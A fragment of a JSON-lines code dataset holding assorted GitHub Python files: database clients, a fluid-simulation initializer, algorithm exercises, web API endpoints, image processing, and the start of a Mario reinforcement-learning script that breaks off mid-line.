slot_response\n\n","repo_name":"PUNEETH21/slot_booking","sub_path":"slot_booking/interactors/book_a_slot_interactor.py","file_name":"book_a_slot_interactor.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21488033142","text":"import pymongo\n\n\nclass MongoClient:\n\n def __init__(self, host, port):\n self._client = pymongo.MongoClient(host=host, port=port)\n self._db = self._client.engblog\n\n def insert_blog(self, blog):\n doc = self._db.blogs.find_one({'url': blog.get('url')})\n if doc is not None:\n return False\n\n self._db.blogs.insert(blog)\n return True\n\n def insert_company(self, company):\n self._db.companies.update_one(\n {'company': company},\n {\"$set\": {'company': company}},\n upsert=True\n )\n","repo_name":"jfwwlong/engblog-spider","sub_path":"mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29328014071","text":"from browser import document, html, window, timer, bind\nfrom breact.baseclasses import *\n\n\n'''\nHTML4 tags : A, ABBR, ACRONYM, ADDRESS, APPLET, AREA, B, \nBASE, BASEFONT, BDO, BIG, BLOCKQUOTE, BODY, BR, BUTTON, \nCAPTION, CENTER, CITE, CODE, COL, COLGROUP, DD, DEL, DFN,\n DIR, DIV, DL, DT, EM, FIELDSET, FONT, FORM, FRAME, FRAMESET, \n H1, H2, H3, H4, H5, H6, HEAD, HR, HTML, I, IFRAME, IMG, INPUT, \n INS, ISINDEX, KBD, LABEL, LEGEND, LI, LINK, MAP, MENU, META, \n NOFRAMES, NOSCRIPT, OBJECT, OL, OPTGROUP, OPTION, P, PARAM, \n PRE, Q, S, SAMP, SCRIPT, SELECT, SMALL, SPAN, STRIKE, STRONG, \n STYLE, SUB, SUP, SVG, TABLE, TBODY, TD, TEXTAREA, TFOOT, TH, \n THEAD, TITLE, TR, TT, U, UL, VAR\nHTML5 tags : ARTICLE, ASIDE, AUDIO, BDI, CANVAS, COMMAND, DATA, \nDATALIST, EMBED, FIGCAPTION, FIGURE, FOOTER, HEADER, KEYGEN, MAIN, \nMARK, MATH, METER, NAV, OUTPUT, PROGRESS, RB, RP, RT, RTC, RUBY, \nSECTION, SOURCE, SUMMARY, TEMPLATE, TIME, TRACK, VIDEO, WBR\nHTML5.1 tags : DETAILS, DIALOG, MENUITEM, PICTURE, SUMMARY\nIn the following link you can find the index of HTML tags with references (DRAFT).\n'''\n\n\n\n\n#tickers\nclass Ticker(StatefulSegment):\n def __init__(self):\n self.oi = GenerateContainers()\n self.state = {\"tick\": 0, \"tock\": 0}\n def update(self, one_state_change=False):\n stfulComp = group(html.DIV(), [\n html.H2(self.state[\"tick\"]),\n html.H2(self.state[\"tock\"])\n ])\n def increment():\n self.setState({\n \"tick\":self.state[\"tick\"]+1, \n \"tock\":self.state[\"tock\"]-1\n })\n \n if not one_state_change:\n print(\"set time out\")\n timer.set_timeout(increment, 1000)\n return stfulComp\n\n\nclass TickerWithDescription(Base):\n def render(self):\n app = html.DIV()\n tk = Ticker()\n # app <= tk.render()\n\n btn = html.BUTTON(\"click me to reset\")\n @bind(btn, \"click\")\n def reset(e):\n tk.setState({\"tick\":0, \"tock\":0}, True)\n # app <= btn\n\n app = group(app, [\n tk.render(), btn\n ])\n return app\n\n\n#text field \nclass AffectedByTextField(StatefulSegment):\n def __init__(self):\n self.oi = GenerateContainers()\n self.state = {\"text\": \"d\"}\n def update(self, one_state_change=False):\n return html.H1(self.state[\"text\"].replace(\"<\", \"<\"))\n\nclass TextField(Base):\n def __init__(self, title):\n self.title = title\n def render(self):\n app = html.DIV()\n\n aft = AffectedByTextField()\n input = html.INPUT(type=\"text\")\n \n \n @bind(input, \"keyup\")\n def update(e):\n aft.setState({\"text\": e.target.value})\n\n app = group(app, [\n html.H1(self.title),\n aft.render(),\n input\n ])\n # app <= aft.render()\n # app <= input\n return app\n\n\n#thing that makes me happy because it uses group a lot!\nclass WithGroups(Base):\n def render(self):\n app = group(html.DIV(), [\n html.H1(\"HI THERE!\"),\n html.H2(\"GOOD TO SEE YOU!\"),\n html.P(\"Some things about me:\"),\n html.UL(\n [\n html.LI(\"I am\"),\n html.LI(\"Does this work\")\n ]\n ),\n html.H2(\"here is a nice little ticker\"),\n TickerWithDescription().render(),\n TextField(\"here is a prop being passed\").render()\n ])\n return app\n\n# app = html.DIV(id=\"hithere\")\n\n\n# # app <= html.H1(\"hi there\", id=\"what\")\n# thing = group(app, [WithGroups().render()])\n# # thing = app\n# document[\"root\"] <= thing\n# thid = document[\"hithere\"]\n# thid.innerHTML = \"hedy\"\n# print(document.getElementById(\"hithere\").innerHTML)\n# document[\"what\"] <= html.H1(\"buy\")","repo_name":"dewball345/breact-example","sub_path":"fbhosting/pages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42636382803","text":"# initializer.py is part of MattFlow\n#\n# MattFlow is free software; you may redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation, either version 3 of the License, or (at your\n# option) any later version. You should have received a copy of the GNU\n# General Public License along with this program. If not, see\n# .\n#\n# (C) 2019 Athanasios Mattas\n# ======================================================================\n\"\"\"Handles the initialization of the simulation.\"\"\"\n\n# x\n# 0 1 2 3 4 5 6 7 8 9\n# 0 G G G G G G G G G G\n# 1 G G G G G G G G G G\n# 2 G G - - - - - - G G\n# 3 G G - - - - - - G G\n# y 4 G G - - - - - - G G\n# 5 G G - - - - - - G G\n# 6 G G - - - - - - G G\n# 7 G G - - - - - - G G\n# 8 G G G G G G G G G G\n# 9 G G G G G G G G G G\n\n\nimport os\nfrom random import randint, uniform\n\nimport numpy as np\nfrom numpy.lib.format import open_memmap\n\nfrom mattflow import config as conf, dat_writer, logger, utils\n\n\ndef _variance():\n \"\"\"Returns the drop-variance used at the different simulation modes.\n\n Use small variance (but > 0.0004) to make the distribution steep and sharp,\n for a better representation of a drop.\n \"\"\"\n variance = {\n \"drop\": randint(5, 8) / 10000,\n \"drops\": randint(5, 8) / 10000,\n \"rain\": 0.0002\n }\n return variance[conf.MODE]\n\n\ndef _drop_heights_multiplier():\n \"\"\"Adjusts the size of the drop, regarding the simulation mode.\"\"\"\n # multiply with 4 / 3 for a small stone droping\n # with 1 / 4 for a water drop with a considerable momentum build\n # with 1 / 6 for a soft water drop\n if conf.MODE == 'drop' or conf.MODE == 'drops':\n factor = randint(6, 12) / 10\n elif conf.MODE == 'rain':\n factor = 1 / 6\n else:\n print(\"Configure MODE | options: 'drop', 'drops', 'rain'\")\n return factor\n\n\ndef _gaussian(variance, drops_count=None):\n '''Populates the mesh with a bivariate gaussian distribution of a certain\n variance.\n\n formula: amplitude * np.exp(-exponent)\n\n Args:\n variance (float) : target variance of the distribution\n drops_count(int) : drop counter\n\n Returs:\n gaussian_distribution (2D array)\n '''\n # random pick of drop center coordinates\n # (mean or expectation of the gaussian distribution)\n if conf.RANDOM_DROP_CENTERS:\n drop_cx = uniform(conf.MIN_X, conf.MAX_X)\n drop_cy = uniform(conf.MIN_Y, conf.MAX_Y)\n else:\n drop_cx = conf.DROPS_CX[drops_count % 10]\n drop_cy = conf.DROPS_CY[drops_count % 10]\n\n # grid of the cell centers\n CX, CY = np.meshgrid(conf.CX, conf.CY)\n\n amplitude = 1 / np.sqrt(2 * np.pi * variance)\n exponent = \\\n ((CX - drop_cx)**2 + (CY - drop_cy)**2) / (2 * variance)\n\n gaussian_distribution = amplitude * np.exp(-exponent)\n return gaussian_distribution\n\n\ndef _drop_heights_correction(drop_heights, divisor=2):\n \"\"\"Subtracts the fluid volume that the drop adds to the domain.\n\n For a few thousands of iterations the fluid level rises quite subtly, but\n after a point the volume adds up to be significant.\n\n Args:\n drop_heights (2D array) : the gaussian distribution modeling the drop\n divisor (int) : divides the correction, resulting to smoother\n correction steps\n\n Returns:\n drop_correction (float) : the extra fluid volume of the drop,\n distributed to the whole domain, divided\n by a divisor for a smoother transition\n to the next time_step\n \"\"\"\n return drop_heights.sum() / drop_heights.size / divisor\n\n\ndef drop(h_hist, drops_count=None):\n \"\"\"Generates a drop.\n\n Drop is modeled as a bivariate gaussian distribution.\n\n Args:\n h_hist (array) : the 0th state variable, U[0, :, :]\n drops_count(int) : drop counter\n\n Returns:\n h_hist(2D array) : drop is added to the input h_hist\n \"\"\"\n variance = _variance()\n drop_heights = (_drop_heights_multiplier()\n * _gaussian(variance, drops_count))\n drop_correction = _drop_heights_correction(drop_heights)\n h_hist += drop_heights - drop_correction\n return h_hist\n\n\ndef _init_U():\n \"\"\"Creates and initializes the state-variables 3D matrix, U.\"\"\"\n cx = conf.CX\n cy = conf.CY\n U = np.zeros((utils.U_shape()), dtype=conf.DTYPE)\n # 1st drop\n U[0, :, :] = conf.SURFACE_LEVEL + drop(U[0, :, :], drops_count=1)\n # Write a .dat file (default: False)\n if conf.WRITE_DAT:\n dat_writer.writeDat(U[0, conf.Ng: -conf.Ng, conf.Ng: -conf.Ng],\n time=0, it=0)\n from mattflow import mattflow_post\n mattflow_post.plotFromDat(time=0, it=0)\n elif not conf.WRITE_DAT:\n pass\n else:\n print(\"Configure WRITE_DAT | Options: True, False\")\n return U\n\n\ndef _init_h_hist(U):\n \"\"\"Creates and initializes h_hist, which holds the stepwise height data.\n\n - holds the states of the fluid for post-processing\n - saving frames every iters\n \"\"\"\n # Number of integer divisions with the freq, times the consecutive frames,\n # plus the consecutive frames that we can take from the remainder of the\n # division.\n num_states_to_save = (\n conf.MAX_ITERS\n // conf.FRAME_SAVE_FREQ\n * conf.FRAMES_PER_PERIOD\n + min(conf.MAX_ITERS % conf.FRAME_SAVE_FREQ, conf.FRAMES_PER_PERIOD)\n )\n h_hist = np.zeros((num_states_to_save, conf.Nx, conf.Ny), dtype=conf.DTYPE)\n h_hist[0] = U[0, conf.Ng: -conf.Ng, conf.Ng: -conf.Ng]\n return h_hist\n\n\ndef _init_U_ds(U): # pragma: no cover\n \"\"\"Creates and initializes U_ds, which holds stepwise data for ML.\"\"\"\n dss = utils.ds_shape()\n ds_name = f\"mattflow_data_{dss[0]}x{dss[1]}x{dss[2]}x{dss[3]}.npy\"\n U_ds = open_memmap(os.path.join(os.getcwd(), ds_name),\n mode='w+',\n dtype=conf.DTYPE,\n shape=dss)\n U_ds[0] = U[:, conf.Ng: - conf.Ng, conf.Ng: - conf.Ng]\n return U_ds\n\n\ndef initialize():\n \"\"\"Wrapper that initializes all necessary data structures.\n\n Returns\n U (3D array) : the state-variables-3D-matrix (populating a x,y grid)\n - shape: (3, Nx + 2 * Ng, Ny + 2 * Ng)\n - U[0] : state varables [h, hu, hv]\n - U[1] : y dimention (rows)\n - U[2] : x dimention (columns)\n h_hist (array) : holds the step-wise height solutions for the\n post-processing animation\n t_hist (array) : holds the step-wise times for the post-\n processing animation\n U_ds (memmap) : holds the state-variables 3D matrix data for all\n the timesteps\n (conf.MAX_ITERS, 3, Nx + 2 * Ng, Ny + 2 * Ng)\n \"\"\"\n logger.log('Initialization...')\n\n U = _init_U()\n h_hist = _init_h_hist(U)\n t_hist = np.zeros(len(h_hist), dtype=conf.DTYPE)\n if conf.SAVE_DS_FOR_ML:\n U_ds = _init_U_ds(U)\n else:\n U_ds = None\n return U, h_hist, t_hist, U_ds\n","repo_name":"ThanasisMattas/mattflow","sub_path":"mattflow/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"40393407003","text":"# -*- coding: utf-8 -*-\n# 4등분 씩 분할하여 최종 결과를 도출해내는 문제이다.\n# queue를 사용하여 정사각형으로 인접한 4개의 숫자를 순서대로 queue에 삽입하고 4개를 비교하여 2번째로 큰 숫자를 row 기준으로 배열에 삽입한다.\n# 이러한 과정을 숫자 1개만 남을 때 까지 반복한다.\n\nimport sys\nfrom collections import deque\n\nN = int(input())\narr = []\ndq = deque()\ncol, row = 0, 0\narr_tmp = []\n\nfor idx in range(N):\n tmp = list(map(int, sys.stdin.readline().split()))\n arr.append(tmp)\n\nwhile N>1:\n for row in range(0, N, 2):\n for col in range(0, N, 2):\n dq.append(arr[row][col])\n dq.append(arr[row][col+1])\n dq.append(arr[row+1][col])\n dq.append(arr[row+1][col+1])\n\n N = N//2\n arr = [[] for _ in range(N)]\n idx = 0\n flag = 1\n\n while len(dq)>1:\n for _ in range(4):\n tmp = dq.popleft()\n arr_tmp.append(tmp)\n\n arr_tmp.sort()\n arr[idx].append(arr_tmp[-2])\n arr_tmp = []\n\n if flag == N:\n idx += 1\n flag = 1\n else: flag += 1\n \n if idx >= N: idx = 0\n\nprint(arr[0][0])","repo_name":"sonhl0723/algorithm","sub_path":"BOJ_restart/Divide and Conquer/17829.py","file_name":"17829.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44976472983","text":"import pytest\nfrom requests import get, post\nfrom json import loads\n\nclass TestAPI:\n def setup(self):\n self.url = \"http://127.0.0.1:8000/calcular/\"\n\n def test_APIstatus(self):\n resp = get(self.url)\n assert resp.ok\n\n def test_APIresponse(self):\n resp = get(self.url)\n message = loads(resp.text)\n assert message[\"message\"] == \"Conexão com sucesso\"\n\n def test_POSTmethod(self):\n resp = post(self.url, json= {\"valor1\" : 10, \"valor2\": 6, \"operacao\": '*'})\n message = loads(resp.text)\n resposta_esperada = {\n \"resultado\":60\n }\n assert message == resposta_esperada\n","repo_name":"nerydyego/Mentorama_pro","sub_path":"Modulo_6/pyTestAtividade.py","file_name":"pyTestAtividade.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"762349937","text":"def lucas_loop(n):\n a, b = 2, 1\n lucas_list = []\n for _ in range(n):\n lucas_list.append(a)\n a, b = b, a + b\n print(lucas_list)\n\n\nif __name__ == '__main__':\n lucas_loop(4)\n","repo_name":"RemineralizedWater/comp348_a3","sub_path":"comp348_a3_q2a.py","file_name":"comp348_a3_q2a.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1067016568","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nfrom tasks.celery_app import app\nfrom tasks.base_task import SqlAlchemyTask\nfrom tasks.stock import PushInventoryTask\nfrom models.inventory import InventoryModel\nfrom models.cooperate_roomtype import CooperateRoomTypeModel\n\nfrom constants import QUEUE_ORDER\nfrom utils.stock_push.inventory import InventoryPusher\nfrom tools.log import Log\n\n\n@app.task(base=SqlAlchemyTask, bind=True, queue=QUEUE_ORDER)\ndef modify_inventory(self, merchant_id, hotel_id, roomtype_id, price_type, change_num, start_date, end_date):\n session = self.session\n stay_days = get_stay_days(start_date, end_date)\n year_months = [(day.year, day.month) for day in stay_days]\n year_months = {}.fromkeys(year_months).keys()\n\n inventories = InventoryModel.get_by_merchant_hotel_roomtype_dates(\n session, merchant_id,\n hotel_id, roomtype_id, year_months)\n\n for day in stay_days:\n inventory = get_inventory_by_date(inventories, day.year, day.month)\n if not inventory:\n continue\n\n if change_num != 0:\n inventory.add_val_by_day(day.day, price_type, change_num)\n else:\n inventory.set_val_by_day(day.day, price_type, change_num)\n r = InventoryPusher(self.session).push_by_roomtype_id(roomtype_id)\n if r:\n session.commit()\n return inventories\n else:\n session.rollback()\n return None\n\ndef get_stay_days(start_date, end_date):\n aday = datetime.timedelta(days=1)\n days = []\n while start_date <= end_date:\n days.append(start_date)\n start_date = start_date + aday\n\n return days\n\ndef combin_year_month(year, month):\n return int(\"{}{:0>2d}\".format(year, month))\n\ndef get_inventory_by_date(inventories, year, month):\n _month = combin_year_month(year, month)\n for inventory in inventories:\n if inventory.month == _month:\n return inventory\n else:\n return\n\n\n@app.task(base=SqlAlchemyTask, bind=True)\ndef complete_in_four_months(self):\n roomtypes = CooperateRoomTypeModel.get_all(self.session)\n InventoryModel.insert_all_in_months(self.session, roomtypes, 13)\n\n","repo_name":"Hackforid/Ebooking","sub_path":"tasks/models/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20973925865","text":"import math\n\nclass Prim:\n\n def min_key(self,key,visited,v):\n min = math.inf\n\n for i in range(v):\n if key[i] < min and i not in visited:\n min_idx = i\n min = key[i]\n return min_idx\n\n def minimum_spanning_tree(self,graph):\n # Find minimum edges\n vertices = len(graph)\n key = [math.inf] * vertices\n key[0] = 0\n parent = [None]*vertices\n parent[0] = -1\n visited = set()\n for i in range(vertices):\n\n u = self.min_key(key,visited,vertices)\n\n visited.add(u)\n\n for v in range(vertices):\n if graph[u][v] != 0 and v not in visited and graph[u][v] < key[v]:\n key[v] = graph[u][v]\n parent[v] = u\n\n \n\n \n\n \n\n\ngraph = [[0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\nPrim().minimum_spanning_tree(graph)","repo_name":"VietDungTran0412/Data-Structure-and-Algorithms","sub_path":"Datastructure&algorithm/Algorithms/Graph/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30315316626","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef condition():\n img_path ='mountain.jpeg'\n rgb = plt.imread(img_path)\n #convert to gray\n gray = cv2.cvtColor(rgb,cv2.COLOR_RGB2GRAY)\n\n #trashold value\n t1,t2 = 100,140\n c , p = 3 , 3\n epsilon = 1e-6\n row,col = gray.shape\n\n #first condition:s = 100, if r >= T1 and r <= T2; otherwise s = 10.\n condition1 = np.zeros((row,col),dtype=np.uint8)\n for x in range(row):\n for y in range(col):\n if(gray[x][y]>=t1 and gray[x][y]<=t2):\n condition1[x][y] = 100\n else:\n condition1[x][y]=10 \n \n #second condition:s = 100, if r >= T1 and r <= T2; otherwise s = r.\n condition2 = np.zeros((row,col),dtype = np.uint8)\n for x in range(row):\n for y in range(col):\n if(gray[x][y] >= t1 and gray[x][y] <= t2):\n condition2[x][y] = 100\n else:\n condition2[x][y] = gray[x][y]\n \n #third condition:s = c log(1 + r) .\n condition3 = np.zeros((row,col),dtype=np.uint8)\n condition3 = c * np.log(gray + 1)\n\n #fourth condition : s = c ( r + epsilon ) ^ p\n condition4 = np.zeros((row,col),dtype = np.uint8)\n condition4 = c * (epsilon + gray) ** p\n\n img_set = [rgb,gray,condition1,condition2,condition3,condition4]\n img_tittle = ['RGB','GRAY','FIRST CONDITION','SECOND CONDITION','THIRD CONDITION','FOURTH CONDITION']\n img_show(img_set,img_tittle)\n\ndef img_show(img_set,img_tittle):\n for i in range(len(img_set)):\n plt.subplot(2,3,i+1)\n plt.title(img_tittle[i])\n plt.imshow(img_set[i],cmap='gray')\n plt.savefig('condition.png')\n plt.tight_layout()\n plt.show()\n\nif __name__ == '__main__':\n condition()\n\n","repo_name":"ashifujjmanRafi/academic_4ru","sub_path":"4.1/ImageProcessing/assignment2/upgradeas2.py","file_name":"upgradeas2.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7587167766","text":"import math\n\ndef snt(n):\n if n < 2:\n return False\n for i in range(2, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True\n\n\n\ndef run():\n n = input()\n dem = 0\n for i in n:\n if(snt(int(i))):\n dem += 1\n # print(dem)\n if snt(len(n)) and dem > len(n) - dem:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef main():\n t = int(input())\n for i in range(0, t):\n run() \n\nmain()","repo_name":"diepdao1708/Python-PTIT","sub_path":"UuTheNguyenTo.py","file_name":"UuTheNguyenTo.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8628375304","text":"from database.db import *\n\n@db_session\ndef register_user(telegram_user):\n if not User.exists(tg_id = telegram_user.id):\n user = User(\n tg_id=telegram_user.id, \n username=telegram_user.username, \n first_name=telegram_user.first_name, \n last_name=telegram_user.last_name)\n flush()\n return user\n else:\n print(f'User {telegram_user.id} exists')\n\n@db_session\ndef get_user(telegram_user):\n return User.get(tg_id=telegram_user.id)\n\n@db_session\ndef get_users():\n return User.select(int(u.tg_id) for u in User)\n \n@db_session()\ndef update_user(\n tg_id : int, \n username : str = None,\n first_name : str = None,\n last_name : str = None,\n is_banned : bool = None\n ):\n\n user_to_update = User.get(tg_id = tg_id)\n if username:\n user_to_update.username = username\n if first_name:\n user_to_update.first_name = first_name\n if last_name:\n user_to_update.last_name = last_name\n if is_banned:\n user_to_update.is_banned = is_banned\n if is_banned == False:\n user_to_update.is_banned = is_banned\n","repo_name":"ovsij/aiogram-ponyorm-template","sub_path":"database/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20309697611","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver import Proxy\n\n\nclass FirefoxDriver:\n def __init__(self, ):\n self.driver = None\n self.proxy = None\n self.proxy_settings = None\n self.firefox_options = Options()\n\n def set_proxy(self, proxy):\n self.proxy = proxy\n\n def start(self):\n\n self.firefox_options.headless = True\n\n # Create a Proxy object using the BrowserMob proxy server\n if self.proxy:\n self.proxy_settings = Proxy({\n \"httpProxy\": self.proxy.proxy,\n \"sslProxy\": self.proxy.proxy\n })\n self.firefox_options.proxy = self.proxy_settings\n\n # Create a new instance of the Firefox driver\n self.driver = webdriver.Firefox(options=self.firefox_options)\n","repo_name":"LiuWilson00/web-crawler","sub_path":"modules/firefox_driver.py","file_name":"firefox_driver.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19458780671","text":"import sys\n\nfrom fastapi import APIRouter, Depends\n\nfrom Models.models import Coordinate, Appointment, MakeAppointment\nfrom Models.user import UserJSON\nfrom Utils.api_psychos import get_psychologist_list, get_psycho_by_id\nfrom Utils.appointment import create_appointment, get_appointment_by_id\nfrom Utils.auth import get_current_user\nfrom Utils.call_logs import create_call_log\nfrom Utils.emergency_call import distance_by_long_and_lat\nfrom Utils.healthcare import get_health_facility_by_id\nfrom Utils.read_file import read_hf_file, read_appointment_file\nfrom Utils.users import not_user\n\nappointment_calls = APIRouter(tags=['Appointment Calls'])\nurl = 'https://ca-sereneapp.braveisland-f409e30d.southeastasia.azurecontainerapps.io/'\n\nhealthcare_json = \"Data/health_facilities.json\"\napp_json = \"Data/appointment.json\"\nfacilities = read_hf_file(healthcare_json)\nappointments = read_appointment_file(app_json)\n\n\n@appointment_calls.get('/closest_fac')\nasync def get_closest_fac(longitude: float, latitude: float, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n closest_fac = {}\n current_coor = Coordinate(longitude=longitude, latitude=latitude)\n current_distance = sys.maxsize\n\n for facility in facilities:\n facility_coor = Coordinate(longitude=facility['coordinates']['longitude'],\n latitude=facility['coordinates']['latitude'])\n dis = distance_by_long_and_lat(facility_coor, current_coor)\n\n if dis < current_distance:\n current_distance = dis\n closest_fac = facility\n\n return [{\"Message\": \"Here is the closest health facility to you\"}, {\"closest_fac\": closest_fac}]\n\n\n@appointment_calls.get('/get_all_psychologists')\nasync def get_all_psychologists(user: UserJSON = Depends(get_current_user)):\n not_user(user)\n return get_psychologist_list()\n\n\n@appointment_calls.get('/get_psychologists_by_id')\nasync def get_psychologist_by_id(psychologist_id: int, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n psycho = get_psycho_by_id(psychologist_id)\n return psycho\n\n\n@appointment_calls.get('/available_psychologists')\nasync def get_available_psychologists_based_on_facility(longitude: float, latitude: float, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n closest_fac_res = await get_closest_fac(longitude=longitude, latitude=latitude, user=user)\n\n closest_fac = closest_fac_res[1]['closest_fac']\n psycho_ids = closest_fac['psychologist_list']\n\n all_psychos = get_psychologist_list()\n list_of_psychos_in_fac = []\n\n for psycho in all_psychos:\n if psycho['psychologist_id'] in psycho_ids:\n list_of_psychos_in_fac.append(psycho)\n\n return list_of_psychos_in_fac\n\n\n@appointment_calls.get('/find_psychologists_location')\nasync def find_psychologists_location_by_id(psychologist_id: int, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n facs_list = []\n for fac in facilities:\n if psychologist_id in fac['psychologist_list']:\n facs_list.append(fac)\n return facs_list\n\n\n@appointment_calls.post('/make_appointment')\nasync def make_appointment(psychologist_id: str, health_facility_id: str, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n add_appointment = MakeAppointment(user_id=user.dict()['id'], psychologist_id=psychologist_id, health_facility_id=health_facility_id)\n new_appointment = Appointment(\n appointment_id=add_appointment.dict()['appointment_id'],\n user_id=add_appointment.dict()['user_id'],\n psychologist_id=add_appointment.dict()['psychologist_id'],\n health_facility_id=add_appointment.dict()['health_facility_id'],\n attended_status=add_appointment.dict()['attended_status']\n )\n made_appointment = await create_appointment(add_appointment=new_appointment, user=user)\n return made_appointment\n\n\n@appointment_calls.post('/make_appointment_call')\nasync def make_appointment_call(appointment_id: str, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n caller_number = user.dict()['phone_number']\n\n appointment = await get_appointment_by_id(appointment_id)\n hf_id = appointment['health_facility_id']\n\n hf = await get_health_facility_by_id(hf_id)\n callee_number = hf['phone_number']\n\n made_call = []\n if callee_number and caller_number:\n made_call = await create_call_log(callee_number=callee_number, caller_number=caller_number, user=user)\n\n return made_call\n\n","repo_name":"vincentfranstyo/Hospicall","sub_path":"Utils/appointment_calls.py","file_name":"appointment_calls.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32172347445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 23 14:53:19 2018\n\n@author: Franc\n\"\"\"\nimport numpy as np\nimport os \nfiles = os.listdir('prediction10')\nfiles_test = [x for x in files if x.startswith('a')]\nfiles_sample = [x for x in files if x.startswith('s')]\nobj = pd.read_csv('prediction10/%s'%files_test[0]).sort_values('SK_ID_CURR').reset_index(drop=True)\ny_true = df_all.loc[df_all.SK_ID_CURR.isin(obj.SK_ID_CURR),['SK_ID_CURR','TARGET']]\n\n#for i in range(96,110): \nfor file in files_test:\n pred = pd.read_csv('prediction10/%s'%file).sort_values('SK_ID_CURR')\n# pred = np.where(pred.TARGET+pred.TARGET_CAT>1,\n# pred[['TARGET','TARGET_CAT']].max(axis=1),\n# pred[['TARGET','TARGET_CAT']].min(axis=1), \n# pred[['TARGET','TARGET_CAT']].mean(axis=1)))\n #y_true[file] = pred.TARGET\n y_true = y_true.merge(pred, on = 'SK_ID_CURR', how='left')\n #print(roc_auc_score(y_true.iloc[:,1:2], pred.TARGET))\ny_true['mean'] = y_true.iloc[:,2:].mean(axis=1)\n\n#roc_auc_score(y_true.iloc[:,1:2], y_true['mean'])\n\nsubmit = pd.DataFrame(dict(SK_ID_CURR = y_true['SK_ID_CURR'].astype('int'),\n TARGET = y_true['mean']))\nsubmit.to_csv('prediction10/asubmit_3.csv',index=False)\n","repo_name":"Franciszz/Competitions","sub_path":"# Credit/code/main_submission_process.py","file_name":"main_submission_process.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"39733851216","text":"import os\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\n\nfrom nes_py.wrappers import JoypadSpace\nimport gym_super_mario_bros\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT\n\nfrom cnn import CNN\nfrom d4pg import D4PGActor, D4PGCritic\nfrom rnd import RNDTargetModel, RNDPredictorModel\n\nfrom noise import OUNoise\n\nfrom memory import Memory\nfrom agent import Agent\nfrom optimizer import Optimizer\n\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# ORIGINAL\n# env = gym_super_mario_bros.make('SuperMarioBros-v0')\n# BLACK\nenv = gym_super_mario_bros.make('SuperMarioBros-v1')\n# PIXEL\n# env = gym_super_mario_bros.make('SuperMarioBros-v2')\nenv = JoypadSpace(env, SIMPLE_MOVEMENT)\n\nstate_info = env.reset()\naction_info = env.action_space.sample()\naction_size = env.action_space.n\n\nprint('states looks like {}'.format(state_info))\n\nprint('states len {}'.format(state_info.shape))\nprint('actions len {}'.format(action_size))\n\n\n# hyperparameters\nALPHA = 1\nGAMMA = 0.99\nTAU = 2e-1\nUPDATE_EVERY = 16\nBUFFER_SIZE = int(1e5)\nBATCH_SIZE = 128\nLR_ACTOR = 1e-4\nLR_CRITIC = 1e-4\n\nADD_NOISE = True\n\nRND_LR = 5e-5\nRND_OUTPUT_SIZE = 128\nRND_UPDATE_EVERY = 32\n\nCHECKPOINT_CNN = './checkpoint_cnn.pth'\nCHECKPOINT_ACTOR = './checkpoint_actor.pth'\nCHECKPOINT_CRITIC = './checkpoint_critic.pth'\nCHECKPOINT_RND_TARGET = './checkpoint_rnd_target.pth'\nCHECKPOINT_RND_PREDICTOR = 